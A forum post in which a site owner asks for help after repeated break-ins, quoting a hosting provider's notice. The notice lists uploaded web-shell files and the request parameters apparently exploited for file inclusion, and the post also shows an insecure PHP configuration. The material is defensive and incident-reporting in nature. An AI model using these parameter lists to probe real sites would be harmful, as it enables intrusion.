Hi,
I am running a patched version of 6.1 (upgraded from 6.0) and keep on getting hacked.
I have the following config:
register_globals = Off
magic_quotes_gpc = On
SAFE_MODE = OFF
allow_url_fopen = On
mod_rewrite = On
RewriteEngine = On
Here is the message I recieved from my host:
Your hosting account has been attacked via an insecure PHP
script.
- the following malicious files have been uploaded to your webspace:
./*******/media/ocra.php
./******/plugins/safehtml/writable.php
./openstar_4.01/index5.php
./*******/plugins/safehtml/HTMLSax3/popup.php
./t*******/ray/modules/chat/data/sounds/popup.php
Having disabled these files, we will unlock your account after this e-mail.
Please understand that the temporary lock of your account was necessary to
protect our infrastructure.
To reestablish the security of your webspace, please proceed now as follows:
Secure all security leaks in your scripts. We found successful
exploits through at least the following:
******* /index.php
$config[ppa_root_path],sourcedir,include_path,root_path,id,prefix,error_log,dir[plugins],sinpaTH,path[docroot],sIncPath,jamroom[jm_dir],idcat,buku_tamu,DOCUMENT_ROOT,page,abg_path,path_escape,pagename,pag,errors,WN_BASEDIR,root_dir,i,custompluginfile[],l,p,s,sbp,x,THEME_DIR
******** /Dolphin/
$config[ppa_root_path],sourcedir,include_path,root_path,id,prefix,error_log,dir[plugins],sinpaTH,path[docroot],sIncPath,idcat,buku_tamu,page,path_escape,pagename,pag,errors,WN_BASEDIR,root_dir,i,custompluginfile[],l,p,s,sbp,x,THEME_DIR
249 /********* /Dolphin/rate.php/plugins/safehtml/safehtml.php
$dir[plugins],dir[plugins]%7Dsafehtml
What can I do to stop these hackers?
the Fluid Druid
